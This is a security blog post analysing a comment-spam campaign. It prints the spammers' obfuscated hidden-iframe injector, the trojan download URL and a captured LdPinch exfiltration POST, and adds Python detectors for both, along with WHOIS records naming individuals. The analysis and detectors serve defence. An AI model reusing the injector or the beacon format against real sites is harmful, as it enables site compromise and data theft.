Blog Spammer

You might notice that from time to time we suffer from blog comment spam. Generally we just delete it, block the user and move on. However, I'm getting kind of tired of it, so I decided to analyze the latest round that hit us a bit. Here are the results so far:

The spam looks something like this, but with hyperlinks here and there:

The Spam:

e9f195616015330be85dfe00e93c4fc3
The Kinetoscope is an early motion picture exhibition device. Rolling Stones Testi, Libreria Blocchi Autocad. Though not a movie projector it was designed for films to be viewed individually through the window of a cabinet housing its components the Kinetoscope video porno scaricare gratis, Scarica Gratis Msn Live Spaces. introduced the basic approach that would become the standard for all cinematic projection before the advent of video: cavalli da salto, Croccantino Gelato. it creates the illusion of movement by conveying a strip of perforated film bearing sequential images over a light source with a high speed shutter. Apt Lombardia, Sherk Cartone Animato. First described in conceptual terms by U.S. inventor Thomas Edison in 1888, video porno com, foto zero assoluto. it was largely developed by his employee William Kennedy Laurie Dickson between 1889 and 1892. Rolling Stones Testi, video hard casalinga gratis. that Desiderius Erasmus nicknamed his academic opponent Jacobus video casalinghe gratis, villaggio vacanza corsica. In April 1894, the first commercial exhibition of motion pictures in history was given in New York City, using ten Kinetoscopes. esercizio svolti elettrotecnica, Falze trevignano. Instrumental to the birth of American movie culture, the Kinetoscope also had a major impact in Europe; video porno con ragazzine, video porno com. its influence abroad was magnified by Edison's decision not to seek international patents on the device, foto privata donna incinta nuda, video clitoride. facilitating numerous imitations of and improvements on the technology.

The URLs all the links go to:
hxxp://mir-t.ru/files/rolling_stones_testi/rolling_stones_testi.htm
hxxp://mebelionika.ru/download/site/libreria_blocchi_autocad/page_libreria_blocchi_autocad.htm
hxxp://mebelionika.ru/download/scarica_gratis_msn_live_spaces/listing/page_scarica_gratis_msn_live_spaces.html
hxxp://dich.com.ua/forum/video_porno_scaricare_gratis/video_porno_scaricare_gratis.htm
hxxp://mir-t.ru/files/cavalli_da_salto.html
hxxp://dich.com.ua/forum/croccantino_gelato.html
hxxp://mir-t.ru/files/apt_lombardia.htm
hxxp://mebelionika.ru/download/index_sherk_cartone_animato.htm
hxxp://dich.com.ua/forum/video_porno_com/page_video_porno_com.htm
hxxp://mebelionika.ru/download/foto_zero_assoluto/foto_zero_assoluto.htm
hxxp://mir-t.ru/files/rolling_stones_testi/rolling_stones_testi.htm
hxxp://dich.com.ua/forum/video_hard_casalinga_gratis/video_hard_casalinga_gratis.htm
hxxp://mir-t.ru/files/video_casalinghe_gratis/video_casalinghe_gratis.htm
hxxp://mebelionika.ru/download/villaggio_vacanza_corsica/comp/page_villaggio_vacanza_corsica.htm
hxxp://dich.com.ua/forum/esercizio_svolti_elettrotecnica/esercizio_svolti_elettrotecnica.htm
hxxp://mebelionika.ru/download/falze_trevignano/falze_trevignano.htm
hxxp://mir-t.ru/files/video_porno_con_ragazzine/page_video_porno_con_ragazzine.html
hxxp://dich.com.ua/forum/video_porno_com/page_video_porno_com.htm
hxxp://mir-t.ru/files/foto_privata_donna_incinta_nuda/style/foto_privata_donna_incinta_nuda.html
hxxp://mebelionika.ru/download/video_clitoride/index/index_video_clitoride.html

So we looked at some of the source of those pages (they are all pretty much the same junk).

They are creating iframes and obfuscating the code so it's not immediately noticeable:

var x = "rame";
var y = "i" + "f";
var el = document.createElement(y + x);
el.setAttribute("width", 1);
el.setAttribute("height", 1);
el.setAttribute("s" + "rc", p);
el.setAttribute("marg" + "inwidth", 0);
el.setAttribute("marg" + "inheight", 0);
el.setAttribute("scr" + "olling", "no");
el.setAttribute("f" + "rameborder", "0");
if (document.body) {
document.body.appendChild(el);
} else {
if (window.addEventListener) {
window.addEventListener("load", (function(e) {document.body.appendChild(el);}), false);
} else if (window.attachEvent) {
window.attachEvent("onload", (function(e) {document.body.appendChild(el);}), false);
} else {
window.onload = (function(e) {document.body.appendChild(el);});
}
}
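The trick in that snippet is only string splitting: every tell-tale token ("iframe", "src", "scrolling") is assembled at run time so a naive grep for createElement("iframe") finds nothing. As an added example (written for this post, not code from the original page or from the spammer's site), here is a small Python scanner that folds the split literals back together, inlines the single-literal variables, and then checks the cleaned script for the hidden-iframe pattern: an iframe element, 1x1 sizing, a src attribute, and an appendChild. The SAMPLE script below is constructed to match the shape of the quoted injector (with the undefined URL variable p left as-is), and BENIGN is a constructed ordinary embed for comparison.

```python
import re

# Constructed sample (assumption): the shape of the injector quoted in the
# post, with the attacker's URL variable left as the undefined name p.
SAMPLE = '''
var x = "rame";
var y = "i" + "f";
var el = document.createElement(y + x);
el.setAttribute("width", 1);
el.setAttribute("height", 1);
el.setAttribute("s" + "rc", p);
el.setAttribute("scr" + "olling", "no");
document.body.appendChild(el);
'''

# A benign embed for comparison (also constructed).
BENIGN = '''
var f = document.createElement("iframe");
f.setAttribute("width", 640);
f.setAttribute("height", 360);
f.setAttribute("src", "https://example.invalid/player");
document.body.appendChild(f);
'''

LIT = r'"([^"\\]*)"'                      # a double-quoted literal without escapes
CONCAT = re.compile(LIT + r'\s*\+\s*' + LIT)
VAR_LIT = re.compile(r'var\s+(\w+)\s*=\s*' + LIT + r'\s*;\s*')


def fold_literals(js):
    """Join adjacent literals ("s" + "rc" -> "src") until nothing changes."""
    prev = None
    while prev != js:
        prev = js
        js = CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), js)
    return js


def inline_constants(js):
    """Replace variables bound to a plain literal with that literal and drop
    the declaration. Only bare identifiers outside other words are touched;
    occurrences inside string literals are not distinguished (a limitation)."""
    consts = {m.group(1): m.group(2) for m in VAR_LIT.finditer(js)}
    js = VAR_LIT.sub('', js)
    for name, val in consts.items():
        pattern = r'(?<![\w"$.])' + re.escape(name) + r'(?![\w"$])'
        js = re.sub(pattern, lambda m, v=val: '"%s"' % v, js)
    return js


def deobfuscate(js):
    """Alternate folding and inlining until the script stops changing."""
    prev = None
    while prev != js:
        prev = js
        js = inline_constants(fold_literals(js))
    return js


def analyze(js):
    """Indicators of a hidden-iframe injector, computed on the cleaned script."""
    clean = deobfuscate(js)
    dims = set(re.findall(r'setAttribute\(\s*"(width|height)"\s*,\s*"?[01]"?\s*\)', clean))
    return {
        "split_literals": fold_literals(js) != js,
        "iframe_created": re.search(r'createElement\(\s*"iframe"\s*\)', clean, re.I) is not None,
        "one_by_one": dims == {"width", "height"},
        "sets_src": re.search(r'setAttribute\(\s*"src"|\.src\s*=', clean) is not None,
        "appended": "appendChild(" in clean,
    }


def is_hidden_iframe_injector(js):
    """Flag a script that builds a 1x1 iframe with a src and attaches it."""
    r = analyze(js)
    return r["iframe_created"] and r["one_by_one"] and r["sets_src"] and r["appended"]


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(analyze(SAMPLE), is_hidden_iframe_injector(SAMPLE))
    print(analyze(BENIGN), is_hidden_iframe_injector(BENIGN))
```

The point of running the checks on the deobfuscated text rather than the raw page is that the same four indicators fire on both the obfuscated and the plain form; the split_literals flag is kept separately because a legitimate embed never needs to spell "iframe" in pieces, so it is a useful secondary signal on its own.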

Then they try to get you to download an exe, hxxp://updateonline.cc/pornocrawler.exe (bad, evil, don't download it!).

This file is identified as:

AntiVir - - TR/Dropper.Gen
BitDefender - - Dropped:Trojan.PWS.LdPinch.TGB
DrWeb - - Trojan.MulDrop.10866
F-Secure - - LdPinch.gen1
Ikarus - - Generic.LdPinch1
Kaspersky - - Trojan-PSW.Win32.LdPinch.fbw
Microsoft - - TrojanDropper:Win32/Small
Norman - - LdPinch.gen1
Panda - - Suspicious file
Prevx1 - - Trojan.Gorhax
Webwasher-Gateway - - Trojan.Dropper.Gen

pornocrawler.exe runs and looks like it's extracting files. In the background it's making network connections:

DNS lookups to:
ya.ru
www.updateonline.cc

Then it does:

POST /winupdate/newgate/gate.php HTTP/1.0
Host: www.updateonline.cc
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 14390

The data is base64 encoded:
a=roots982@mail.ru333&b=Pinch_report&d=report.bin&c=UDNNTAAAAAARIAAAEQAAAAAAAA

... snip

AAAAAA==

What's in the encoded data is a bunch of info about the machine, such as what you have installed, hostname, domain name, internal IP, and other data.
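What that POST looks like when you take it apart, as an added example written for this post (not the author's code): the request line, the headers and the a/b/d form fields are copied from the capture above; the c= blob is the base64 of a report I constructed, since the real one is snipped. The parser keeps form values raw because the capture shows the base64 sent verbatim (a '+' inside it would be turned into a space by normal form decoding), and the indicator scoring at the end is my own heuristic for spotting this kind of gate.php report beacon in proxy logs.

```python
import base64
import re

# Constructed sample (assumption): request line and headers as quoted in the
# post, form fields a/b/d as quoted, and the c= blob replaced with base64 of a
# report we built ourselves.
REPORT = (b"host=LAB-PC\x00domain=WORKGROUP\x00ip=10.0.0.5\x00"
          b"os=Windows XP\x00installed=Office;Acrobat\x00")
BODY = ("a=roots982@mail.ru333&b=Pinch_report&d=report.bin&c="
        + base64.b64encode(REPORT).decode("ascii"))
SAMPLE_REQUEST = (
    "POST /winupdate/newgate/gate.php HTTP/1.0\r\n"
    "Host: www.updateonline.cc\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: Keep-Alive\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    "\r\n"
    + BODY
)

# An ordinary form post (constructed) that the scoring should leave alone.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=bob&remember=1"
)


def parse_request(raw):
    """Split a raw HTTP request into method, path, headers and form fields.
    Form values are kept raw (no percent/plus decoding): the capture shows the
    base64 sent verbatim, and a '+' inside it must not become a space."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            fields[name] = value
    return {"method": method, "path": path, "headers": headers, "fields": fields}


def decode_report(fields):
    """Base64-decode the c= blob, tolerating stripped padding."""
    blob = fields.get("c", "").strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob)


def beacon_indicators(req):
    """Each indicator is something visible in the captured request."""
    f = req["fields"]
    c = f.get("c", "")
    return {
        "post_to_gate": req["method"] == "POST" and req["path"].endswith("gate.php"),
        "pinch_marker": f.get("b") == "Pinch_report",
        "report_filename": f.get("d", "").endswith(".bin"),
        "mailbox_in_a": re.fullmatch(r"[^@\s&]+@[^@\s&]+", f.get("a", "")) is not None,
        "large_base64": len(c) >= 64 and re.fullmatch(r"[A-Za-z0-9+/=]+", c) is not None,
    }


def is_pinch_beacon(req, threshold=3):
    """Score the indicators; three or more is a hit."""
    return sum(beacon_indicators(req).values()) >= threshold


if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    print(beacon_indicators(req), is_pinch_beacon(req))
    print(decode_report(req["fields"]))
    print(is_pinch_beacon(parse_request(BENIGN_REQUEST)))
```

The a= field carrying a mailbox and the fixed b=Pinch_report marker are the two cheapest things to alert on; the size check exists because a real report (14390 bytes in the capture above) is far larger than any normal login or comment form, so a proxy rule on "POST with a single large base64 field to a gate.php path" catches this family even if the marker strings change.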

It also installs the actual PornoCrawler and makes some connections out:

hxxp://qzip.cjb.net

The porncrawler actually connects out to www.pornocrawler.ws
GET / HTTP/1.1
Host: www.bitchgallery.com
Connection: close
Accept: */*

GET /main.htm HTTP/1.1
Host: dirty.little-bitch.com
Connection: close
Accept: */*

Etc.

Then it drops flashget.exe, which is custom packed, is the process that actually sends the base64 POST, and is identified as Trojan.PWS.LdPinch.TGB.

So who is doing this? Well, the person is using an email address whose domain is owned by a Chinese company, and the IP is hosted in Prague, CZ. He's coming from an IP address that's hosted on a German ISP, and the links redirect you to a lot of Russian sites. The predominant language used is Italian.

The email address he is using:

qff09296@averfame.org

Sponsoring Registrar:EstDomains, Inc. (R1345-LROR)
Status:OK
Registrant ID:DI_5745467
Registrant Name:Harold Lani
Registrant Organization:China Construction Bank
Registrant Street1:Mansion, No.31 Guangji Street
Registrant Email:harold@avereanoia.org

averfame.org = 78.108.181.22
inetnum: 78.108.180.0 - 78.108.183.255
netname: UPL-NET-CUSTOMERS
descr: UPL Telecom
country: CZ
changed: serge@upl.cz 20071227
address: UPL TELECOM s.r.o
address: Vinohradska 184/2396
address: Prague 3,130 52
address: Czech Republic

The IP he is coming from:
212.227.118.40

canonical name infong113.kundenserver.de.
aliases
addresses 212.227.118.40
Domain: kundenserver.de
Type: PERSON
Name: Achim Weiss
Address: Erbprinzenstr. 4 - 12
Pcode: 76133
City: Karlsruhe
Country: DE
Remarks: ID [#6716189/6255634]
Changed: 2001-12-04T12:30:12+01:00

role: Schlund NCC
address: 1&1 Internet AG
address: Brauerstrasse 48
address: D-76135 Karlsruhe
address: Germany
remarks: For abuse issues, please use only abuse@oneandone.net
phone: +49 721 91374 50
fax-no: +49 721 91374 20
e-mail: noc@oneandone.net

The MD5 sums for these samples are :
1a32fc1f222a7f0c28341d96911cd0ff - flashget.exe
f33ffb86241fb528f8c12cc9d8be3126 - pornocrawler.exe

So with a little more time and effort I bet we can find out more :)

V.

Nice

Great job, Val.

I totally dislike spammers, especially when they try to make you download Trojans etc. It happens a lot, but I agree with you that at some point it is enough, and that it's time to do something about it.

I hope you/others will find more about this person.

~KL

yeh we could easily fix this

by adding some stuff to drupal, but we've had other priorities. one of these days we will take care of it.

V.

A little more info

updateonline.cc
64.28.177.140

DOMAIN WHOIS:

Light (info@updateonline.cc)
Balboa Ave. 3 98
Houston
Texas,77015
US
Tel. +1.2815761540
ns20.esthost.com
ns19.esthost.com

The info was fairly sparse.

NETWORK WHOIS:

OrgName: Cernel, Inc
OrgID: CERNE-3
Address: 23404 W. Lyons Ave #223
City: Santa Clarita
StateProv: CA
PostalCode: 91321
Country: US
OrgAbuseEmail: abuse@cernel.net

This is the site where the malware exe gets downloaded. It doesn't look legitimate at all. The main page only has "under constr" on it and archives don't show that a site was ever there.

Google says:

This site may harm your computer.

The IP address this crap is hosted on is owned by a company called Cernel which seems to be a legitimate ISP.

cernel.net

Maybe contacting them will get them to shut off this site. As of today the malware is still on there.

NOTE: turns out I was wrong on this. Some info I got indicates they are badguys too.

V.